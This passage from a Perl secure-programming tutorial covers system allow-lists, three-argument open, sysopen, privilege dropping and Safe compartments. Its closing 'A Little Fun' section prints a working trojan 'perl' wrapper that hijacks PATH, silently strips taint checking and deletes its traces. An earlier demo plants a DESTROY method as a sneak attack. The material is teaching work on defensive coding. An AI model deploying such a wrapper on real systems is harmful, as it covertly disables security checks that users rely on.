In this form, if @args is just the single argument ( "/bin/echo 'Hello'" ), system assumes that the name of the command is the whole string. Of course, it fails because there is no command /bin/echo 'Hello'. Somewhere in my program I need to go back and ensure those pieces show up as separate elements in @args.

To be even safer, I might want to keep a hash of allowed programs for system. If the program is not in the hash, I don’t execute the external command:

if( exists $Allowed_programs{ $args[0] } ) {
    system { $args[0] } @args;
    }
else {
    warn qq|"$args[0]" is not an allowed program|;
    }
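The check above leaves open how %Allowed_programs gets its values. One way to fill it in, as a sketch under my own assumptions, is to key the hash on full paths and wrap the check in a subroutine. The run_allowed name and the two listed programs are hypothetical:

```perl
use strict;
use warnings;

# Hypothetical allow-list for this sketch; the keys are full paths so
# PATH plays no part in choosing the program.
my %Allowed_programs = map { $_ => 1 } qw( /bin/echo /bin/date );

# Returns system's status (0 on success), or undef if the program
# is not on the list or no command was given.
sub run_allowed {
    my @args = @_;
    return undef unless @args and exists $Allowed_programs{ $args[0] };
    return system { $args[0] } @args;
}

my $status  = run_allowed( '/bin/echo', 'Hello; still one argument' );
my $refused = run_allowed( '/usr/bin/mail', 'joe@example.com' );

print "echo exited with status $status\n";
print "mail was refused\n" unless defined $refused;
```

Because the subroutine always uses the indirect object form, even a command that passes the allow-list check never reaches the shell.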

Three Argument open

Since v5.6, the open built-in has a three (or more) argument form that separates the file mode from the filename. My previous opens were problems because the filename string also told open what to do with the file. If I could infect the filename, I could trick open into doing things the programmer didn’t intend. In the three argument form, whatever characters show up in $file are the characters in the filename, even if those characters are |, >, and so on:

#!/usr/bin/perl -T

my( $file ) = $ARGV[0] =~ m/([A-Z0-9_.-]+)/gi;

open my $fh, '>>', $file or die "Could not open [$file] for append: $!";

This doesn’t get around taint checking, but it is safer. You’ll find a more detailed discussion of this form of open in Chapter 8 of Intermediate Perl, as well as perlopentut.
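A short sketch shows that the three argument form treats special characters as part of the name. The filename here is a deliberately odd one that I made up, and the sketch assumes a Unix-like filesystem that allows a pipe character in a filename:

```perl
use strict;
use warnings;
use File::Spec;
use File::Temp qw(tempdir);

# A scratch directory that is removed when the program exits.
my $dir = tempdir( CLEANUP => 1 );

# An odd but legal filename that would mean "pipe" to the
# two argument open.
my $file = File::Spec->catfile( $dir, 'notes.txt |' );

open my $out, '>>', $file or die "Could not open [$file] for append: $!";
print {$out} "one line\n";
close $out or die "Could not close [$file]: $!";

open my $in, '<', $file or die "Could not open [$file] for reading: $!";
my $line = <$in>;
close $in;

print "Read back: $line";
```

Perl creates a file whose name really does end in a space and a pipe character, and no command runs.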

sysopen

The sysopen function gives me even more control over file access. It has a three argument form that keeps the access mode separate from the filename and has the added benefit of exotic modes that I can configure minutely. For instance, the append mode in open creates the file if it doesn’t already exist. That’s two separate flags in sysopen: one for appending and one for creating:

#!/usr/bin/perl -T

use Fcntl qw(:DEFAULT);

my( $file ) = $ARGV[0] =~ m/([A-Z0-9_.-]+)/gi;

sysopen( my( $fh ), $file, O_WRONLY|O_APPEND|O_CREAT )
    or die "Could not open file: $!\n";

Since these are separate flags, I can use them apart from each other. If I don’t want to create new files, I leave off the O_CREAT. If the file doesn’t exist, Perl won’t create it, so no one can trick my program into making a file he might need for a different exploit:

#!/usr/bin/perl -T

use Fcntl qw(:DEFAULT);

my( $file ) = $ARGV[0] =~ m/([A-Z0-9_.-]+)/gi;

sysopen( my( $fh ), $file, O_WRONLY|O_APPEND )
    or die "Could not append to file: $!";
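I can check that behavior in a scratch directory. This is a sketch under my own assumptions: the app.log name and the 0600 permissions are hypothetical choices, not anything the earlier examples require:

```perl
use strict;
use warnings;
use Fcntl qw(:DEFAULT);
use File::Spec;
use File::Temp qw(tempdir);

my $dir  = tempdir( CLEANUP => 1 );
my $file = File::Spec->catfile( $dir, 'app.log' );

# Without O_CREAT, a missing file is an error rather than a new file.
my $opened_missing = sysopen( my $missing, $file, O_WRONLY|O_APPEND ) ? 1 : 0;
my $created_anyway = -e $file ? 1 : 0;

# With O_CREAT the file is created; 0600 is a hypothetical choice of
# permissions (owner read and write only), still subject to umask.
sysopen( my $log, $file, O_WRONLY|O_APPEND|O_CREAT, 0600 )
    or die "Could not create [$file]: $!";
print {$log} "first entry\n";
close $log or die "Could not close [$file]: $!";

# Now the append-only open succeeds because the file exists.
my $opened_existing = sysopen( my $again, $file, O_WRONLY|O_APPEND ) ? 1 : 0;

print "missing: $opened_missing, created anyway: $created_anyway, ",
      "existing: $opened_existing\n";
```

The first sysopen fails and leaves nothing behind, which is the point: the program appends only to files that someone deliberately created.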

Limit Special Privileges

Since Perl automatically turns on taint checking when I run the program as a different user than my real user, I should limit the scope of the special privileges. I might do this by forking a process to handle the part of the program that requires greater privileges, or give up the special privileges when I don’t need them anymore. I can set the real and effective users to the real user so I don’t have more privileges than I need. I can do this with the POSIX module:

use POSIX qw(setuid);

setuid( $< );

There are other ways to do this, but they are beyond the scope of this chapter (and even this book, really), and they depend on your particular operating system. This isn’t a problem specific to Perl, so you handle it the same way you would in any other language: compartmentalize or isolate the special access.
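Whichever approach I choose, it is worth confirming that the privileges are really gone before the program carries on. This is a minimal sketch of the setuid call with that check added. The drop_privileges name is my own, and the sketch leaves group IDs alone, which a real setuid program would also have to consider:

```perl
use strict;
use warnings;
use POSIX qw(setuid);

# Give up any extra privileges and confirm that it worked.
sub drop_privileges {
    setuid( $< ) or die "Could not drop privileges: $!";

    # $< is the real user ID and $> is the effective user ID.
    die "Effective user is still $>, expected $<" unless $> == $<;
    return 1;
}

drop_privileges();
print "Running as user $>\n";
```

When an ordinary user runs this, the call changes nothing and the check passes trivially; the check matters when the program starts with a different effective user.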

Safe Compartments

The Safe module provides me a way to limit what I allow to happen for a section of the code. It creates a new namespace which that code is trapped in, unable to look outside that namespace, and it limits the operations the code in that compartment can do.

I use Safe much like eval. I give the reval method a code string, which it compiles under its restrictions and, if everything’s okay, runs. While running the code, it may run into other violations, which stop it:

# safe.pl
use v5.16;
use Safe 2.35;

say "Running $0 under $^V with Safe ", Safe->VERSION;

my $compartment = Safe->new;

my $code =<<'CODE';
use v5.10;
say "Hello Safe!";
CODE

$compartment->reval( $code ) or do {
    my $error = $@;
    warn "Safe compartment error! $error";
    };

When I run this, I get an error:

% perl safe.pl
Running safe.pl under v5.18.0 with Safe 2.35
Safe compartment error! 'require' trapped by operation mask

The Safe “compartment” won’t run that code because I haven’t allowed it to carry out the require “opcode” that use needs. The compartment has a very limited set of default operations it allows, but I have to tell it to allow the useful stuff. The Opcode module, which Safe relies on, lists the opcodes and the names of sets of opcodes I can use. So far, it trapped the require opcode, so I can permit that one:

my $compartment = Safe->new;
$compartment->permit( 'require' );

When I run it again, I get another error:

% perl safe.pl
Running safe.pl under v5.18.0 with Safe 2.35
Safe compartment error! 'say' trapped by operation mask

I can add that opcode to the ones I permit. This is much like the Prussian stance that I mentioned earlier. I only allow the things that I need:

my $compartment = Safe->new;
$compartment->permit( qw(require say) );

Now it all works:

% perl safe.pl
Running safe.pl under v5.18.0 with Safe 2.35
Hello Safe!

If I want to allow a set of opcodes instead of listing them individually, I can use the sets defined in Opcode, much like import tags in modules. For example, I can include all the input-output opcodes with :base_io:

$compartment->permit( qw(require :base_io) );

I can combine the permit, permit_only, deny, and deny_only methods to create the set of allowable operations.
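The deny method works in the other direction from permit: it takes operations away from whatever the compartment currently allows. In this sketch I compare a compartment with the default set to one where I have denied the add opcode. The try_code helper is a hypothetical name of my own:

```perl
use strict;
use warnings;
use Safe;

# Hypothetical helper: evaluate a string in a compartment and
# describe what happened.
sub try_code {
    my( $compartment, $code ) = @_;
    my $result = $compartment->reval( $code );
    if( my $error = $@ ) {
        chomp $error;
        return "trapped: $error";
    }
    return "ok: $result";
}

my $default = Safe->new;      # starts with Opcode's :default set
my $no_add  = Safe->new;
$no_add->deny( 'add' );       # same set, minus the addition opcode

my $allowed = try_code( $default, '2 + 2' );
my $denied  = try_code( $no_add,  '2 + 2' );

print "$allowed\n";
print "$denied\n";
```

The first compartment returns the sum, while the second reports that the operation mask trapped the addition.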

Inside the compartment, Safe uses its own namespace although it looks like the main:: package inside the reval. By default, only the *_ variables, $_ and @_, are visible. That way, the compartment can’t betray the environment or other information that might be sensitive. Here I try to use the $0 variable to output the program name:

# safe-no-share.pl
use v5.16;
use Safe 2.35;

my $compartment = Safe->new;
$compartment->permit( qw(require say) );

my $code =<<'CODE';
use v5.10;
say "Hello Safe, from $0!";
CODE

$compartment->reval( $code ) or do {
    my $error = $@;
    warn "Safe compartment error! $error";
    };

I don’t see the program name in the output because Safe hides it:

% perl safe-no-share.pl
Hello Safe, from !

If I want to share a particular variable, I can use the share_from method to let the compartment see a variable from a particular package:

# safe-share.pl
use v5.16;
use Safe 2.35;

say "Running $0 under $^V with Safe ", Safe->VERSION;

my $compartment = Safe->new;
$compartment->permit( qw(require say) );
$compartment->share_from( 'main', [ qw( $0 ) ] );

my $code =<<'CODE';
use v5.10;
say "Hello Safe, from $0!";
CODE

$compartment->reval( $code ) or do {
    my $error = $@;
    warn "Safe compartment error! $error";
    };

Now it works:

% perl safe-share.pl
Hello Safe, from safe-share.pl!

There’s more about what you can allow, deny, share, or hide in the compartment, and the Safe module tells you about it.

There is one more feature that I really like. A compartment will delete DESTROY and AUTOLOAD methods it finds in the class it uses. Although it looks like the compartment uses the main:: namespace, it’s really a special one which I can get with the root method:

# safe-root.pl
use v5.16;
use Safe 2.35;

{
my $compartment = Safe->new;
my $root = $compartment->root;
say "Safe namespace is $root";
}

When I run this, the output doesn’t mention main:: at all:

% perl safe-root.pl
Safe namespace is Safe::Root0

If I were trying to be clever, I could try to define methods in that namespace to trick it into running something. The DESTROY and AUTOLOAD methods typically aren’t called explicitly so they make good vectors for sneak attacks. I might try this, where outside the compartment I define a method in the namespace of the compartment:

# safe-root.pl
use v5.16;
use Safe 2.35;

{
my $compartment = Safe->new;
my $root = $compartment->root;
say "Safe namespace is $root";

no strict 'refs';
*{ $root . '::DESTROY' } = sub {
    my( $self, $arg ) = @_;
    $arg //= 'default';
    say "Calling DESTROY with $self $arg";
    };

say "$root can DESTROY" if $root->can( 'DESTROY' );
$root->DESTROY( 'Explicit' );
}

When I run this, I see that I was able to define the DESTROY method and call it explicitly as a class method, but I don’t get any output when $compartment goes out of scope, when I might expect Perl to call it as an instance method:

% perl safe-root.pl
Safe namespace is Safe::Root0
Safe::Root0 can DESTROY
Calling DESTROY with Safe::Root0 Explicit

Compare this to the equivalent “unsafe” code where I create a do nothing class with the same methods:

# unsafe.pl
use v5.10;

package Unsafe {
    sub new { bless {}, $_[0] }
    sub root { __PACKAGE__ }
    }

{
my $compartment = Unsafe->new;
my $root = $compartment->root;
say "Unsafe namespace is $root";

no strict 'refs';
*{ $root . '::DESTROY' } = sub {
    my( $self, $arg ) = @_;
    $arg //= 'default';
    say "Calling DESTROY with $self $arg";
    };

say "$root can DESTROY" if $root->can( 'DESTROY' );
$root->DESTROY( 'Explicit' );
}

When I run that program, I see two calls to DESTROY, one of which is a class method call and one of which is an instance method call that happens when $compartment goes out of scope:

% perl unsafe.pl
Unsafe namespace is Unsafe
Unsafe can DESTROY
Calling DESTROY with Unsafe Explicit
Calling DESTROY with Unsafe=HASH(0x7fdf59005468) default

So, when would I want to use this? In the rare case where I want to evaluate a bit of Perl that I get as a string, perhaps from configuration (although see Chapter 11 for why you should avoid that), serialization, or something else. For instance, I want to take a simple addition in the form of a string such as "2 + 2", and get the answer to the arithmetic. Instead of using a normal string eval, I can use Safe’s reval.

I’ll start with a simple REPL program where someone enters a line and I return the answer only when they are doing exactly what I need. I start by creating a Safe compartment where I deny everything:

# safe-repl.pl
use v5.16;
use Safe 2.35;

my $compartment = Safe->new;
$compartment->deny( qw(:default) );

LINE: while( <> ) {
    chomp;
    # check $@ rather than the result so a legitimate answer of 0 isn't an error
    my $result = $compartment->reval( $_ );
    if( my $error = $@ ) {
        warn "\tSafe compartment error for [$_]! $error";
        next LINE;
        }
    say "$_ = $result";
    }

When I try to run this, the compartment catches everything because I’ve allowed nothing:

% perl safe-repl.pl
2 + 2
    Safe compartment error for [2 + 2]! 'constant item' trapped

The problem is that Safe gives me a description of the operation it trapped, not the opcode name. That’s okay. I can see the complete map with a one-liner. It’s a long list, so I show only an excerpt here:

% perl -MOpcode=opdump -e opdump
     const  constant item
    padany  private value
     rv2gv  ref-to-glob cast
 leaveeval  eval "string" exit

If I want to find only the entries that match a string, I can give opdump an argument:

% perl -MOpcode=opdump -e 'opdump shift' item
     const  constant item

So, I modify my program to allow const:

my $compartment = Safe->new;
$compartment->deny( qw(:default) );
$compartment->permit( qw(const) );

When I try again, I get a different violation:

% perl safe-repl.pl
2 + 2
    Safe compartment error for [2 + 2]! 'ref-to-glob cast' trapped

So, I find that opcode name:

% perl -MOpcode=opdump -e 'opdump shift' ref-to-glob
    rv2gv  ref-to-glob cast

I add that to the operations I permit:

my $compartment = Safe->new;
$compartment->deny( qw(:default) );
$compartment->permit( qw(const rv2gv) );

I try again, and again, until eventually I’ve sussed out all of the opcodes I need:

my $compartment = Safe->new;
$compartment->deny( qw(:default) );
$compartment->permit( qw(const rv2gv lineseq padany add leaveeval) );

If you’re one of the very few Perlers who know the opcodes just by looking at the code, you probably don’t have to go through this process. Now I have something that almost works:

% perl safe-repl.pl
2 + 2
2 + 2 = 4

I say “almost” because I’ve denied many opcodes but I haven’t limited all the undesirable statements that someone can make out of those. For instance, I can have a statement that has no addition in it, or a syntax error:

% perl5.18.0 safe-repl.pl
2 + 2
2 + 2 = 4
2
2 = 2
2 3 4
Number found where operator expected
        (Missing operator before  3?)
Number found where operator expected
        (Missing operator before  4?)
        Safe compartment error for [2 3 4]! syntax error
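One way to close that gap is to check the shape of the input before it ever reaches reval. This is a sketch under my own assumptions: the checked_add name and the pattern for "exactly one addition" are hypothetical, and I use a compartment with the default operations so the sketch does not depend on the exact opcode list:

```perl
use strict;
use warnings;
use Safe;

my $compartment = Safe->new;

# Hypothetical rule: exactly two non-negative integers joined by a plus.
my $addition = qr/\A \s* ([0-9]+) \s* \+ \s* ([0-9]+) \s* \z/x;

# Returns the sum, or undef if the line is not a plain addition.
sub checked_add {
    my( $line ) = @_;
    return undef unless defined $line and $line =~ $addition;

    # Rebuild the expression from the captured pieces only.
    my $result = $compartment->reval( "$1 + $2" );
    return undef if $@;
    return $result;
}

for my $line ( '2 + 2', '2', '2 3 4' ) {
    my $sum = checked_add( $line );
    print defined $sum ? "$line = $sum\n" : "rejected [$line]\n";
}
```

The pattern does the narrowing and the compartment stays in place as a second line of defense in case the pattern lets through more than I intended.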

Safe Limitations

The Safe module has other limitations. It’s not going to keep the code I allow from using up all the memory or CPU. If I allow operations such as chdir, the rest of the program may see those side effects, and so on. As with the other things I have shown in this chapter, Safe doesn’t prevent bad things from ever happening. It makes someone work a lot harder to exploit problems, but only if I program carefully and pay attention.

A Little Fun

Here’s a program that pretends to be the real perl, exploiting the same PATH insecurity the real perl catches. If I can trick you into thinking this program is perl, probably by putting it somewhere close to the front of your path, taint checking does you no good. It scrubs the argument list to remove -T, then scrubs the shebang line to do the same thing. It saves the new program, then runs it with a real perl which it gets from PATH (excluding itself, of course). Taint checking is a tool, not a cure. It tells me where I need to do some work. Have I said that enough yet?

#!/usr/bin/perl
# perl-untaint (rename as just 'perl')
use File::Basename;

# get rid of -T on command line
my @args = grep { ! /-T/ } @ARGV;

# determine program name. Usually that's the first thing
# after the switches (or the '--' which ends switches). This
# won't work if the last switch takes an argument, but handling
# that is just a matter of work.
my( $double ) = grep { $args[$_] eq '--' }  0 .. $#args;
my  @single   = grep { $args[$_] =~ m/^-/ } 0 .. $#args;

my $program_index = do {
       if( $double )  { $double + 1 }
    elsif( @single )  { $single[-1] + 1 }
    else              { 0 }
    };

my $program = splice @args, $program_index, 1, undef;

unless( -e $program ) {
    warn qq|Can't open perl program "$program": No such file or directory\n|;
    exit;
    }

# save the program to another location (current dir probably works)
my $modified_program = basename( $program ) . ".evil";
splice @args, $program_index, 1, $modified_program;

open FILE, '<', $program;
open TMP, '>', $modified_program or exit; # quiet!

my $shebang = <FILE>;
$shebang =~ s/-T//;

print TMP $shebang, <FILE>;

# find out who I am (the first thing in the path) and take out that dir
# this is especially useful if . is in the path.
my $my_dir = dirname( `which perl` );
$ENV{PATH} = join ":", grep {
    $_ ne $my_dir and $_ ne '.'
    } split /:/, $ENV{PATH};

# find the real perl now that I've reset the path
chomp( my $Real_perl = `which perl` );

# run the program with the right perl but without taint checking
system("$Real_perl @args");

# clean up. We were never here.
unlink $modified_program;

So there it is. When you think you have it figured out, someone is going to find another way. Even Samuel L. Jackson as a sysadmin couldn’t hold off the dinosaurs.

Summary

Perl knows that injudiciously passing around data can cause problems, and has features to give me, the programmer, ways to handle that. Taint checking is a tool that helps me find parts of the program that try to pass external data to resources outside of the program. Perl intends for me to scrutinize these data and turn them into something I can trust before I use them. Checking and scrubbing the data isn’t the only answer, and I need to program defensively using the other security features Perl offers. Even then, taint checking doesn’t ensure I’m completely safe and I still need to carefully consider the entire security environment just as I would with any other programming language.

Tuesday, 11 August 2015
